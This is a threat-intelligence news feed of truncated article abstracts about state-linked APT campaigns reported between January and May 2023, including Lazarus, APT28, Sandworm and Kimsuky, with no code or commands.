CommonMagic Implants Linked to CloudWizard Full Text
Abstract
The APT campaign employs a modular framework called CloudWizard. This framework is capable of taking screenshots, keylogging, and recording audio from the microphone. The CloudWizard framework comprises nine modules that enable a variety of hacking capabilities. Cyware
May 17, 2023
Lancefly APT Group Uses ‘Merdoor’ In Espionage Campaign Full Text
Abstract
The Lancefly APT group is targeting government, aviation, education, and telecom sectors in South and Southeast Asia using a powerful backdoor called Merdoor for intelligence gathering. The exact initial intrusion vector is not clear at present, though attackers are believed to have used SSH brute- ... Cyware
May 16, 2023
China-linked APT Mustang Panda targets TP-Link routers with a custom firmware implant Full Text
Abstract
China-linked APT group Mustang Panda employed a custom firmware implant targeting TP-Link routers in targeted attacks since January 2023. Since January 2023, Check Point Research monitored a series of targeted attacks aimed at European foreign...Security Affairs
May 16, 2023
Water Orthrus APT Re-Emerges with Two New Malware Families Full Text
Abstract
The threat actor known as Water Orthrus was spotted with two new campaigns in March and April 2023 that intended to deliver CopperStealth and CopperPhish payloads. The new malware families have been upgraded for different purposes, such as injecting network advertisements, acquiring personal informatio ... Cyware
May 16, 2023
Lancefly APT uses powerful Merdoor backdoor in attacks on Asian orgs Full Text
Abstract
The Lancefly APT group is using a custom powerful backdoor called Merdoor in attacks against organizations in South and Southeast Asia. Symantec researchers reported that the Lancefly APT group is using a custom-written backdoor in attacks targeting...Security Affairs
May 11, 2023
New APT Group Red Stinger Targets Military and Critical Infrastructure in Eastern Europe Full Text
Abstract
A previously undetected advanced persistent threat (APT) actor dubbed Red Stinger has been linked to attacks targeting Eastern Europe since 2020. "Military, transportation, and critical infrastructure were some of the entities being targeted, as well as some involved in the September East Ukraine referendums," Malwarebytes disclosed in a report published today. "Depending on the campaign, attackers managed to exfiltrate snapshots, USB drives, keyboard strokes, and microphone recordings." Red Stinger overlaps with a threat cluster Kaspersky revealed under the name Bad Magic last month as having targeted government, agriculture, and transportation organizations located in Donetsk, Lugansk, and Crimea last year. While there were indications that the APT group may have been active since at least September 2021, the latest findings from Malwarebytes push the group's origins back by nearly a year, with the first operation taking place in December 2020. The Hacker News
May 11, 2023
North Korea-linked APT breached the Seoul National University Hospital Full Text
Abstract
The Korean National Police Agency (KNPA) warns that a North Korea-linked APT group had breached the Seoul National University Hospital (SNUH). The Korean National Police Agency (KNPA) revealed that a North Korea-linked APT group has breached one of the largest...Security Affairs
May 09, 2023
Researchers Uncover SideWinder’s Latest Server-Based Polymorphism Technique Full Text
Abstract
The advanced persistent threat (APT) actor known as SideWinder has been accused of deploying a backdoor in attacks directed against Pakistan government organizations as part of a campaign that commenced in late November 2022. "In this campaign, the SideWinder advanced persistent threat (APT) group used a server-based polymorphism technique to deliver the next stage payload," the BlackBerry Research and Intelligence Team said in a technical report published Monday. Another campaign discovered by the Canadian cybersecurity company in early March 2023 shows that Turkey has also landed in the crosshairs of the threat actor's collection priorities. SideWinder has been on the radar since at least 2012 and it's primarily known to target various Southeast Asian entities located across Pakistan, Afghanistan, Bhutan, China, Myanmar, Nepal, and Sri Lanka. Suspected to be an Indian state-sponsored group, SideWinder is also tracked under the monikers APT-C-17, APT-Q-39, Ha ... The Hacker News
May 9, 2023
Iran-linked APT groups started exploiting Papercut flaw Full Text
Abstract
Microsoft warns of Iran-linked APT groups that are targeting vulnerable PaperCut MF/NG print management servers. Microsoft warns that Iran-linked APT groups have been observed exploiting the CVE-2023-27350 flaw in attacks against PaperCut MF/NG print...Security Affairs
May 7, 2023
Dragon Breath APT uses double-dip DLL sideloading strategy Full Text
Abstract
An APT group tracked as Dragon Breath has been observed employing a new DLL sideloading technique. Sophos researchers observed an APT group, tracked as Dragon Breath (aka APT-Q-27 and Golden Eye), that is using a new DLL sideloading technique that...Security Affairs
May 06, 2023
Dragon Breath APT Group Using Double-Clean-App Technique to Target Gambling Industry Full Text
Abstract
An advanced persistent threat (APT) actor known as Dragon Breath has been observed adding new layers of complexity to its attacks by adopting a novel DLL side-loading mechanism. "The attack is based on a classic side-loading attack, consisting of a clean application, a malicious loader, and an encrypted payload, with various modifications made to these components over time," Sophos researcher Gabor Szappanos said. "The latest campaigns add a twist in which a first-stage clean application 'side'-loads a second clean application and auto-executes it. The second clean application side-loads the malicious loader DLL. After that, the malicious loader DLL executes the final payload." Operation Dragon Breath, also tracked under the names APT-Q-27 and Golden Eye, was first documented by QiAnXin in 2020, detailing a watering hole campaign designed to trick users into downloading a trojanized Windows installer for Telegram. A subsequent campaign de ... The Hacker News
May 5, 2023
North Korea-linked Kimsuky APT uses new recon tool ReconShark Full Text
Abstract
North Korea-linked APT group Kimsuky has been observed using a new reconnaissance tool dubbed ReconShark in a recent campaign. SentinelOne researchers observed an ongoing campaign from North Korea-linked Kimsuky Group that is using...Security Affairs
May 4, 2023
Dragon Breath APT Uses Double DLL Sideloading Tactic Full Text
Abstract
A group of advanced persistent hackers, who go by the alias Dragon Breath, has adopted a new strategy of utilizing multiple sophisticated versions of the conventional DLL sideloading method to avoid detection. Its attack strategy involves using an initial vector that exploits a legitimate applicati ... Cyware
May 4, 2023
Russia-linked Sandworm APT uses WinRAR in destructive attacks on Ukraine’s public sector Full Text
Abstract
CERT-UA is warning of destructive cyberattacks conducted by the Russia-linked Sandworm APT group against the Ukraine public sector. Russia-linked APT group Sandworm is behind destructive cyberattacks against Ukrainian state networks, the Ukrainian...Security Affairs
May 4, 2023
APT28 Uses ‘Windows Update’ Phishing Emails to Target Ukrainian Agencies Full Text
Abstract
Russian state-sponsored hacking group APT28 is targeting Ukrainian government entities with malicious emails disguised as Windows update instructions, warned CERT-UA. The attack begins with phishing emails sent to employees in government bodies, masquerading as system administrators of their depar ... Cyware
May 2, 2023
North Korea-linked ScarCruft APT uses large LNK files in infection chains Full Text
Abstract
North Korea-linked ScarCruft APT group started using oversized LNK files to deliver the RokRAT malware starting in early July 2022. Check Point researchers reported that the infection chains observed in the attacks attributed to North Korea-linked...Security Affairs
May 01, 2023
APT28 Targets Ukrainian Government Entities with Fake “Windows Update” Emails Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks perpetrated by Russian nation-state hackers targeting various government bodies in the country. The agency attributed the phishing campaign to APT28, which is also known by the names Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit, and Sofacy. The email messages come with the subject line "Windows Update" and purportedly contain instructions in the Ukrainian language to run a PowerShell command under the pretext of security updates. Running the script loads and executes a next-stage PowerShell script that's designed to collect basic system information through commands like tasklist and systeminfo, and exfiltrate the details via an HTTP request to a Mocky API. To trick the targets into running the command, the emails impersonated system administrators of the targeted government entities using fake Microsoft Outlook email accounts created with the employees' ... The Hacker News
May 1, 2023
Russian APT Nomadic Octopus hacked Tajikistani carrier Full Text
Abstract
Russian APT group Nomadic Octopus hacked a Tajikistani carrier to spy on government officials and public service infrastructures. Russian cyber espionage group Nomadic Octopus (aka DustSquad) has hacked a Tajikistani telecoms provider to spy on 18 entities,...Security Affairs
April 30, 2023
Russia-linked APT28 uses fake Windows Update instructions to target Ukraine govt bodies Full Text
Abstract
CERT-UA warns of a spear-phishing campaign conducted by APT28 group targeting Ukrainian government bodies with fake ‘Windows Update’ guides. Russia-linked APT28 group is targeting Ukrainian government bodies with fake ‘Windows Update’ guides,...Security Affairs
April 27, 2023
Iranian Charming Kitten APT used a new BellaCiao malware in recent wave of attacks Full Text
Abstract
Iran-linked APT group Charming Kitten employed a new malware dubbed BellaCiao in attacks against victims in the U.S., Europe, the Middle East and India. Iran-linked Charming Kitten group, (aka APT35, Phosphorus, Newscaster, and Ajax Security Team)...Security Affairs
April 26, 2023
China-linked Alloy Taurus APT uses a Linux variant of PingPull malware Full Text
Abstract
China-linked threat actor tracked as Alloy Taurus is using a Linux variant of the PingPull backdoor and a new tool dubbed Sword2033. Researchers from Palo Alto Networks Unit 42 recently observed the China-linked Alloy Taurus group (aka GALLIUM,...Security Affairs
April 26, 2023
Charming Kitten APT Uses BellaCiao Malware to Target Victims in US, Europe, Middle East, and India Full Text
Abstract
This malware is tailored to suit individual targets and exhibits a higher level of complexity, evidenced by a unique communication approach with its command-and-control (C2) infrastructure.Cyware
April 24, 2023
Mint Sandstorm Targets U.S. Critical Infrastructure Full Text
Abstract
Microsoft connected the Iranian Mint Sandstorm APT group (aka PHOSPHORUS) to a wave of attacks, between late-2021 and mid-2022, targeting the U.S. critical infrastructure. The group targets private/public organizations, including activists, journalists, the Defense Industrial Base (DIB), political ... Read MoreCyware
April 20, 2023
APT28 Uses Vulnerability in Cisco Routers to Deploy Malware Full Text
Abstract
Government agencies in the U.S. and the U.K. issued a joint advisory to warn organizations about attacks exploiting an old vulnerability in Cisco routers. The attacks are attributed to the Fancy Bear threat group and the flaw in question is CVE-2017-6742. The attackers are exploiting the vulnerabil ... Read MoreCyware
April 20, 2023
Lazarus APT group employed Linux Malware in recent attacks and was linked to 3CX supply chain attack Full Text
Abstract
North Korea-linked APT group Lazarus employed new Linux malware in attacks that are part of Operation Dream Job. North Korea-linked APT group Lazarus is behind a new campaign tracked as Operation DreamJob (aka DeathNote or NukeSped) that employed...Security Affairs
April 20, 2023
New Infrastructure of MuddyWater APT Group Uncovered Full Text
Abstract
MuddyWater has been employing SimpleHelp, a lawful tool used for managing and controlling remote devices, to establish persistence on compromised devices, revealed researchers. The attackers send phishing emails containing links to file storage systems such as OneDrive, Dropbox, or OneHub to downlo ... Read MoreCyware
April 20, 2023
Google TAG warns of Russia-linked APT groups targeting Ukraine Full Text
Abstract
The researchers from Google TAG are warning of Russia-linked threat actors targeting Ukraine with phishing campaigns. Russia-linked threat actors launched large-volume phishing campaigns against hundreds of users in Ukraine to gather intelligence...Security Affairs
April 19, 2023
US and UK agencies warn of Russia-linked APT28 exploiting Cisco router flaws Full Text
Abstract
UK and US agencies are warning of the Russia-linked APT28 group exploiting vulnerabilities in Cisco networking equipment. The Russia-linked APT28 group accesses unpatched Cisco routers to deploy malware by exploiting the unpatched CVE-2017-6742 vulnerability...Security Affairs
April 19, 2023
Iran-linked Mint Sandstorm APT targeted US critical infrastructure Full Text
Abstract
An Iran-linked APT group tracked as Mint Sandstorm is behind a string of attacks aimed at US critical infrastructure between late 2021 and mid-2022. Microsoft has linked the Iranian Mint Sandstorm APT (previously tracked by Microsoft as PHOSPHORUS)...Security Affairs
April 18, 2023
Ex-Conti Members and Fin7 APT Join Hands for New Domino Backdoor Full Text
Abstract
The now-defunct Conti ransomware gang members were observed deploying a new malware strain, dubbed Domino, that appears to have been developed by the FIN7 cybercrime organization. Domino has been active in the wild since at least October 2022. Organizations and security teams need a robust Threat I ... Read MoreCyware
April 17, 2023
China-linked APT41 group spotted using open-source red teaming tool GC2 Full Text
Abstract
In October 2022, threat actors sent phishing emails that contained links to a password-protected file hosted in Drive. The final payload was the Go-written GC2 tool that gets commands from Google Sheets and exfiltrates data to Google Drive.Cyware
April 17, 2023
Vixen Panda APT Group suspected of targeting foreign ministry in cyberattack Full Text
Abstract
A Chinese hacker group, Vixen Panda, is suspected of targeting the Foreign Ministry in a recent cyberattack. As per a new report by Euractiv, the hackers showed a keen interest in policy documents.Cyware
April 17, 2023
Google Uncovers APT41’s Use of Open Source GC2 Tool to Target Media and Job Sites Full Text
Abstract
A Chinese nation-state group targeted an unnamed Taiwanese media organization to deliver an open source red teaming tool known as Google Command and Control (GC2) amid broader abuse of Google's infrastructure for malicious ends. The tech giant's Threat Analysis Group (TAG) attributed the campaign to a threat actor it tracks under the geological and geographical-themed moniker HOODOO, which is also known by the names APT41, Barium, Bronze Atlas, Wicked Panda, and Winnti. The starting point of the attack is a phishing email that contains links to a password-protected file hosted on Google Drive, which, in turn, incorporates the GC2 tool to read commands from Google Sheets and exfiltrate data using the cloud storage service. "After installation on the victim machine, the malware queries Google Sheets to obtain attacker commands," Google's cloud division said in its sixth Threat Horizons Report. "In addition to exfiltration via Drive, GC2 enablThe Hacker News
April 15, 2023
APT28 Leader’s Email Breached by Ukrainian Hackers Full Text
Abstract
Ukrainian hacker group Cyber Resistance claimed to have hacked the personal accounts, emails, and social media of a Russian GRU officer, who is also the leader of APT28. The email hack allowed the hackers to extract sensitive documents along with personal information and photos, and then leak them ... Read MoreCyware
April 13, 2023
The Russia-linked APT29 is behind recent attacks targeting NATO and EU Full Text
Abstract
Poland intelligence linked the Russian APT29 group to a series of attacks targeting NATO and European Union countries. Poland's Military Counterintelligence Service and its Computer Emergency Response Team linked a recent string of attacks targeting...Security Affairs
April 13, 2023
Pakistan-Aligned Transparent Tribe APT Expands Interest in Indian Education Sector Full Text
Abstract
SentinelLabs has been tracking a recently disclosed cluster of malicious Office documents that distribute Crimson RAT, used by the APT36 group (aka Transparent Tribe) targeting the education sector.Cyware
April 12, 2023
Ukrainian Hackers Breach Email of APT28 Leader, Who’s Wanted by FBI Full Text
Abstract
Ukrainian hacker group Cyber Resistance, aka Ukrainian Cyber Alliance, has claimed to have hacked the email, social media, and personal accounts of Russian GRU officer Lieutenant Colonel Sergey Alexandrovich Morgachev, the leader of APT28.Cyware
April 10, 2023
Iran-linked MERCURY APT behind destructive attacks on hybrid environments Full Text
Abstract
Iran-linked APT group MERCURY is behind destructive attacks on hybrid environments masquerading as a ransomware operation. The Microsoft Threat Intelligence team observed a series of destructive attacks on hybrid environments that were carried out by MuddyWater...Security Affairs
April 6, 2023
Analyzing attacks conducted by North Korea-linked ARCHIPELAGO APT group Full Text
Abstract
Google's Threat Analysis Group (TAG) warns of a North Korea-linked cyberespionage group tracked as ARCHIPELAGO. Google's Threat Analysis Group (TAG) is warning of the North Korea-linked ARCHIPELAGO group that is targeting government and military personnel,...Security Affairs
April 2, 2023
Leaked documents from Russian firm NTC Vulkan show Sandworm cyberwarfare arsenal Full Text
Abstract
Files leaked by Russian IT contractor NTC Vulkan show that Russia-linked Sandworm APT requested it to develop offensive tools. Documents leaked from Russian IT contractor NTC Vulkan show it was likely involved in the development of offensive tools....Security Affairs
March 31, 2023
Winter Vivern APT Targets European Government Entities with Zimbra Vulnerability Full Text
Abstract
The advanced persistent threat (APT) actor known as Winter Vivern is now targeting officials in Europe and the U.S. as part of an ongoing cyber espionage campaign. "TA473 since at least February 2023 has continuously leveraged an unpatched Zimbra vulnerability in publicly facing webmail portals that allows them to gain access to the email mailboxes of government entities in Europe," Proofpoint said in a new report. The enterprise security firm is tracking the activity under its own moniker TA473 (aka UAC-0114), describing it as an adversarial crew whose operations align with Russian and Belarusian geopolitical objectives. What it lacks in sophistication, it makes up for in persistence. In recent months, the group has been linked to attacks targeting state authorities of Ukraine and Poland as well as government officials in India, Lithuania, Slovakia, and the Vatican. The NATO-related intrusion wave entails the exploitation of CVE-2022-27926 (CVSS score:The Hacker News
March 29, 2023
Bitter APT Espionage Group Targets Nuclear Energy Firms in China Full Text
Abstract
The nuclear energy sector of China is reportedly facing threats from Bitter, a South Asian APT. The group specializes in using Excel exploits, Windows Installer (MSI) files, and Microsoft Compiled HTML Help (CHM) files. Besides, the group is infamous for targeting energy and government organization ... Read MoreCyware
March 29, 2023
North Korean APT43 Group Uses Cybercrime to Fund Espionage Operations Full Text
Abstract
A new North Korean nation-state cyber operator has been attributed to a series of campaigns orchestrated to gather strategic intelligence that aligns with Pyongyang's geopolitical interests since 2018. Google-owned Mandiant, which is tracking the activity cluster under the moniker APT43, said the group's motives are both espionage- and financially-motivated, leveraging techniques like credential harvesting and social engineering to further its objectives. The monetary angle to its attack campaigns is an attempt on the part of the threat actor to generate funds to meet its "primary mission of collecting strategic intelligence." Victimology patterns suggest that targeting is focused on South Korea, the U.S., Japan, and Europe, spanning government, education, research, policy institutes, business services, and manufacturing sectors. The threat actor was also observed straying off course by striking health-related verticals and pharma companies from October 2020The Hacker News
March 28, 2023
Newly exposed APT43 hacking group targeting US orgs since 2018 Full Text
Abstract
A new North Korean hacking group has been revealed to be targeting government organizations, academics, and think tanks in the United States, Europe, Japan, and South Korea for the past five years.BleepingComputer
March 28, 2023
Pakistan-Origin SideCopy Linked to New Cyberattack on India’s Ministry of Defence Full Text
Abstract
An advanced persistent threat (APT) group that has a track record of targeting India and Afghanistan has been linked to a new phishing campaign that delivers Action RAT. According to Cyble, which attributed the operation to SideCopy, the activity cluster is designed to target the Defence Research and Development Organization (DRDO), the research and development wing of India's Ministry of Defence. Known for emulating the infection chains associated with SideWinder to deliver its own malware, SideCopy is a threat group of Pakistani origin that shares overlaps with Transparent Tribe. It has been active since at least 2019. Attack chains mounted by the group involve using spear-phishing emails to gain initial access. These messages come bearing a ZIP archive file that contains a Windows shortcut file (.LNK) masquerading as information about the K-4 ballistic missile developed by DRDO. Executing the .LNK file leads to the retrieval of an HTML application from a remoteThe Hacker News
March 28, 2023
Bitter APT group targets China’s nuclear energy sector Full Text
Abstract
Intezer researchers reported that a South Asian espionage group, tracked as Bitter, is targeting the Chinese nuclear energy industry. Intezer researchers uncovered a cyberespionage campaign targeting the Chinese nuclear energy sector, they linked...Security Affairs
March 27, 2023
Technical analysis of China-linked Earth Preta APT’s infection chain Full Text
Abstract
China-linked Earth Preta cyberespionage group has been observed adopting new techniques to bypass security solutions. Trend Micro researchers reported that the China-linked Earth Preta group (aka Mustang Panda) is actively changing its tools, tactics,...Security Affairs
March 24, 2023
SideCopy APT Targets India’s Premier Defense Research Agency Full Text
Abstract
SideCopy APT traditionally uses spear phishing as its method to gain initial entry. Emails in the latest campaign purportedly contain research material about military technologies sent as attachments.Cyware
March 23, 2023
Kimsuky Updates its Tactics to Target South Korean Experts Full Text
Abstract
German and South Korean government agencies warned about a new spear-phishing campaign by the North Korean APT, Kimsuky. The campaign targets experts on issues related to the Korean peninsula. Attackers send a spear-phishing email to the targeted victims, asking them to install a malicious Chrome e ... Read MoreCyware
March 23, 2023
Black Magic APT Targets Ukraine with CommonMagic and PowerMagic Full Text
Abstract
Kaspersky researchers have identified cyberattacks targeting government, agriculture, and transportation organizations in Donetsk, Lugansk, and Crimea, conducted by the new Bad Magic APT. The campaign leverages old artifacts created as early as September 2021, along with a previously unseen malicio ... Read MoreCyware
March 22, 2023
Winter Vivern APT Targets European Government Entities With Aperetif Full Text
Abstract
SentinelOne spotted the Winter Vivern APT group targeting Polish government agencies, Indian government entities, the Ukraine Ministry of Foreign Affairs, and the Italy Ministry of Foreign Affairs in cyberespionage campaigns since 2021.Cyware
March 21, 2023
New Bad Magic APT used CommonMagic framework in the area of Russo-Ukrainian conflict Full Text
Abstract
Threat actors are targeting organizations located in Donetsk, Lugansk, and Crimea with a previously undetected framework dubbed CommonMagic. In October 2022, Kaspersky researchers uncovered a malware campaign aimed at infecting government, agriculture...Security Affairs
March 21, 2023
New APT Found Actively Using PowerMagic Backdoor and CommonMagic Framework Full Text
Abstract
In October 2022, Kaspersky researchers identified an active infection of government, agriculture, and transportation organizations located in the Donetsk, Lugansk, and Crimea regions.Cyware
March 17, 2023
China-based Tick APT Deploys Custom Malware and Uses Other Tools Full Text
Abstract
ESET researchers found that the Tick cyberespionage group compromised an East Asian Data-Loss Prevention (DLP) company in 2021 and used a wide range of tools in similar attacks. In one of its campaigns, it used a tampered version of a legitimate app called Q-Dir to drop an open-source VBScript back ... Read MoreCyware
March 17, 2023
China-linked APT likely linked to Fortinet zero-day attacks Full Text
Abstract
An alleged Chinese threat actor group is behind attacks on government organizations exploiting a Fortinet zero-day flaw (CVE-2022-41328). A suspected China-linked group is exploiting a Fortinet zero-day vulnerability, tracked as CVE-2022-41328, in attacks...Security Affairs
March 17, 2023
Winter Vivern APT Group Targeting Indian, Lithuanian, Slovakian, and Vatican Officials Full Text
Abstract
The advanced persistent threat known as Winter Vivern has been linked to campaigns targeting government officials in India, Lithuania, Slovakia, and the Vatican since 2021. The activity targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government, SentinelOne said in a report shared with The Hacker News. "Of particular interest is the APT's targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing war," senior threat researcher Tom Hegel said. Winter Vivern, also tracked as UAC-0114, drew attention last month after the Computer Emergency Response Team of Ukraine (CERT-UA) detailed a new malware campaign aimed at state authorities of Ukraine and Poland to deliver a piece of malware dubbed Aperetif. Previous public reports chronicling the group show that it has leveraged weaponized Microsoft Excel documents conThe Hacker News
March 15, 2023
Russia-linked APT29 abuses EU information exchange systems in recent attacks Full Text
Abstract
Russia-linked APT29 group abused the legitimate information exchange systems used by European countries to target government entities. Russia-linked APT29 (aka SVR group, Cozy Bear, Nobelium, and The Dukes) was spotted abusing the legitimate information...Security Affairs
March 15, 2023
YoroTrooper APT group targets CIS countries and embassies Full Text
Abstract
A new APT group, dubbed YoroTrooper, has been targeting government and energy organizations across Europe, experts warn. Cisco Talos researchers uncovered a new cyber espionage group targeting CIS countries, embassies and EU health care agency since...Security Affairs
March 15, 2023
Tick APT Targeted High-Value Customers of East Asian Data-Loss Prevention Company Full Text
Abstract
A cyberespionage actor known as Tick has been attributed with high confidence to a compromise of an East Asian data-loss prevention (DLP) company that caters to government and military entities. "The attackers compromised the DLP company's internal update servers to deliver malware inside the software developer's network, and trojanized installers of legitimate tools used by the company, which eventually resulted in the execution of malware on the computers of the company's customers," ESET researcher Facundo Muñoz said. Tick, also known as Bronze Butler, REDBALDKNIGHT, Stalker Panda, and Stalker Taurus, is a suspected China-aligned collective that has primarily gone after government, manufacturing, and biotechnology firms in Japan. It's said to be active since at least 2006. Other lesser-known targets include Russian, Singaporean, and Chinese enterprises. Attack chains orchestrated by the group have typically leveraged spear-phishing emails and strThe Hacker News
March 13, 2023
Dark Pink APT targets Govt entities in South Asia Full Text
Abstract
Researchers reported that Dark Pink APT employed a malware dubbed KamiKakaBot against Southeast Asian targets. In February 2023, EclecticIQ researchers spotted multiple KamiKakaBot malware samples that were employed by the Dark Pink APT group (aka...Security Affairs
March 8, 2023
North Korea-linked Lazarus APT used a 0-day in a recent attack Full Text
Abstract
North Korea-linked Lazarus APT group exploits a zero-day vulnerability in attacks aimed at a South Korean financial entity. ASEC (AhnLab Security Emergency Response Center) observed North Korea-linked Lazarus APT group exploiting a zero-day vulnerability...Security Affairs
March 8, 2023
China-linked APT Sharp Panda targets government entities in Southeast Asia Full Text
Abstract
China-linked APT group Sharp Panda targets high-profile government entities in Southeast Asia with the Soul modular framework. In late 2022, CheckPoint researchers observed a campaign attributed to the China-linked APT group Sharp Panda that is targeting...Security Affairs
March 6, 2023
After Clasiopa, APT41 Targets Asian Materials Sector Full Text
Abstract
Symantec warned against the Chinese state-sponsored Winnti, aka APT41 and Blackfly, hacker group targeting two subsidiaries of an Asian conglomerate in the materials sector. The operation ran from late 2022 to early 2023, with a focus on intellectual property theft. Symantec has provided IOCs to de ... Read MoreCyware
March 3, 2023
MQsTTang, a new backdoor used by Mustang Panda APT against European entities Full Text
Abstract
China-Linked Mustang Panda APT employed MQsTTang backdoor as part of an ongoing campaign targeting European entities. China-linked Mustang Panda APT group has been observed using a new backdoor, called MQsTTang, in attacks aimed at European...Security Affairs
February 28, 2023
APT-C-36 Strikes Again: Blind Eagle Hackers Target Key Industries in Colombia Full Text
Abstract
The threat actor known as Blind Eagle has been linked to a new campaign targeting various key industries in Colombia. The activity, which was detected by the BlackBerry Research and Intelligence Team on February 20, 2023, is also said to encompass Ecuador, Chile, and Spain, suggesting a slow expansion of the hacking group's victimology footprint. Targeted entities include health, financial, law enforcement, immigration, and an agency in charge of peace negotiation in Colombia, the Canadian cybersecurity company said. Blind Eagle, also known as APT-C-36, was recently covered by Check Point Research, detailing the adversary's advanced toolset comprising Meterpreter payloads that are delivered via spear-phishing emails. The latest set of attacks involves the group impersonating the Colombian government tax agency, the National Directorate of Taxes and Customs (DIAN), to phish its targets using lures that urge recipients to settle "outstanding obligations." ThThe Hacker News
February 25, 2023
CERT of Ukraine says Russia-linked APT backdoored multiple govt sites Full Text
Abstract
The CERT of Ukraine (CERT-UA) revealed that Russia-linked threat actors have compromised multiple government websites this week. The Computer Emergency Response Team of Ukraine (CERT-UA) said that Russia-linked threat actors have breached multiple...Security Affairs
February 21, 2023
Newly Identified Earth Yako APT Observed Targeting Japanese Entities Full Text
Abstract
Trend Micro experts observed several targeted attacks against researchers of academic organizations and think tanks in Japan and attributed the campaign to Earth Yako. Previous to this, Earth Yako APT group has been abusing legitimate services such as Dropbox, GitHub, and Protonmail to expand its c ... Read MoreCyware
February 19, 2023
ENISA and CERT-EU warn of Chinese APTs targeting EU organizations Full Text
Abstract
A joint report published by ENISA and CERT-EU warns of Chinese APTs targeting businesses and government organizations in the European Union. The European Union Agency for Cybersecurity (ENISA) and CERT-EU warn of multiple China-linked threat actors...Security Affairs
February 15, 2023
North Korea’s APT37 Targeting Southern Counterpart with New M2RAT Malware Full Text
Abstract
The North Korea-linked threat actor tracked as APT37 has been linked to a piece of new malware dubbed M2RAT in attacks targeting its southern counterpart, suggesting continued evolution of the group's features and tactics. APT37, also tracked under the monikers Reaper, RedEyes, Ricochet Chollima, and ScarCruft, is linked to North Korea's Ministry of State Security (MSS) unlike the Lazarus and Kimsuky threat clusters that are part of the Reconnaissance General Bureau (RGB). According to Google-owned Mandiant, MSS is tasked with "domestic counterespionage and overseas counterintelligence activities," with APT37's attack campaigns reflective of the agency's priorities. The operations have historically singled out individuals such as defectors and human rights activists. "APT37's assessed primary mission is covert intelligence gathering in support of DPRK's strategic military, political, and economic interests," the threat intelligence fiThe Hacker News
February 15, 2023
Dark Caracal APT Reappears with a New Version of Bandook Spyware Full Text
Abstract
Lookout Security published a report describing the activities of a new APT actor dubbed Dark Caracal that has claimed hundreds of infections in more than a dozen countries since March of 2022. The APT is currently using a new version of Bandook spyware to target Windows systems. Organizations ... Read MoreCyware
February 13, 2023
Earth Zhulong Group Uses ShellFang Loader to Target Vietnam Full Text
Abstract
Information on the sophisticated APT group Earth Zhulong, which targets Vietnamese organizations, has recently come to light. The gang, which has been active since 2020, is thought to be connected to the hacker collective 1937CN from China. Organizations are suggested to stay alert and leverage bes ... Read MoreCyware
February 12, 2023
Russian Nodaria APT Adds Advanced Information Stealing Functionality Full Text
Abstract
Researchers from Broadcom Symantec took the wraps off of an information-stealing malware known as Graphiron. The Russia-affiliated APT group Nodaria is using it in operations against Ukraine. Written in the Go programming language, the malware enables operators to gather a variety of data from the infe ... Read MoreCyware
February 10, 2023
DPRK funds malicious cyber activities with ransomware attacks on critical infrastructure Full Text
Abstract
North Korea-linked APT groups conduct ransomware attacks against healthcare and critical infrastructure facilities to fund their activities. Ransomware attacks on critical infrastructure conducted by North Korea-linked hacker groups are used by the government...Security Affairs
February 3, 2023
Russia-linked Gamaredon APT targets Ukrainian authorities with new malware Full Text
Abstract
Russia-linked threat actor Gamaredon employed new spyware in cyber attacks aimed at public authorities and critical information infrastructure in Ukraine. The State Cyber Protection Centre (SCPC) of Ukraine warns of a new wave of targeted attacks...Security Affairs
February 2, 2023
New APT34 Malware Targets The Middle East Full Text
Abstract
Trend Micro analyzed a cyberespionage campaign targeting organizations in the Middle East in December 2022 using a new backdoor. It abuses compromised email accounts to send stolen data to external mail accounts controlled by attackers.Cyware
January 30, 2023
Sandworm APT group hit Ukrainian news agency with five data wipers Full Text
Abstract
The Ukrainian CERT (CERT-UA) discovered five different wipers deployed on the network of the country's national news agency, Ukrinform. On January 17, 2023, the Telegram channel "CyberArmyofRussia_Reborn" reported the compromise of the systems at the Ukrainian...Security Affairs
January 28, 2023
Sandworm APT targets Ukraine with new SwiftSlicer wiper Full Text
Abstract
Russia-linked Sandworm APT group is behind a new Golang-based wiper, tracked as SwiftSlicer, that hit Ukraine, ESET reports. Researchers from ESET discovered a new Golang-based wiper, dubbed SwiftSlicer, that was used in attacks aimed at Ukraine....Security Affairs
January 25, 2023
North Korea-linked TA444 group turns to credential harvesting activity Full Text
Abstract
North Korea-linked TA444 group is behind a credential harvesting campaign targeting a number of industry verticals. Proofpoint researchers reported that North Korea-linked TA444 APT group (aka APT38, BlueNoroff, Copernicium, and Stardust Chollima)...Security Affairs
January 24, 2023
FBI confirms that North Korea-linked Lazarus APT is behind Harmony Horizon Bridge $100 million cyber heist Full Text
Abstract
The U.S. FBI attributes the $100 million cyber heist against Harmony Horizon Bridge to North Korea-linked Lazarus APT. The U.S. Federal Bureau of Investigation (FBI) this week confirmed that in June 2022 the North Korea-linked Lazarus APT group and APT38...Security Affairs
January 19, 2023
BackdoorDiplomacy APT Uses Turian Backdoor to Target Iranian Government Full Text
Abstract
BackdoorDiplomacy is continuously evolving its TTPs during cyberespionage campaigns. Unit 42 spotted the new campaign by the group that targeted Iranian government entities between July and December 2022. Historically, it has targeted government and diplomatic entities in the Middle East and A ... Read MoreCyware
January 11, 2023
StrongPity APT Uses Trojanized Telegram App to Backdoor its Victims Full Text
Abstract
According to ESET researchers, attackers use a fake Shagle website that tricks victims into downloading the malicious APK file. In reality, the app is a trojanized version of the standard Telegram app for Android.Cyware
January 11, 2023
Dark Pink APT Group Targets Governments and Military in APAC Region Full Text
Abstract
Government and military organizations in the Asia-Pacific region are being targeted by a previously unknown advanced persistent threat (APT) actor, per the latest research conducted by Albert Priego of Group-IB. Singapore-headquartered Group-IB, in a report shared with The Hacker News, said it's tracking the ongoing campaign under the name Dark Pink and attributed seven successful attacks to the adversarial collective between June and December 2022. The bulk of the attacks have singled out military bodies, government ministries and agencies, and religious and non-profit organizations in Cambodia, Indonesia, Malaysia, the Philippines, Vietnam, and Bosnia and Herzegovina, with one unsuccessful intrusion reported against an unnamed European state development body based in Vietnam. The threat actor is estimated to have commenced its operations way back in mid-2021, although the attacks ramped up only a year later using a never-before-seen custom toolkit designed to plunder valuableThe Hacker News
January 10, 2023
StrongPity APT spreads backdoored Android Telegram app via fake Shagle site Full Text
Abstract
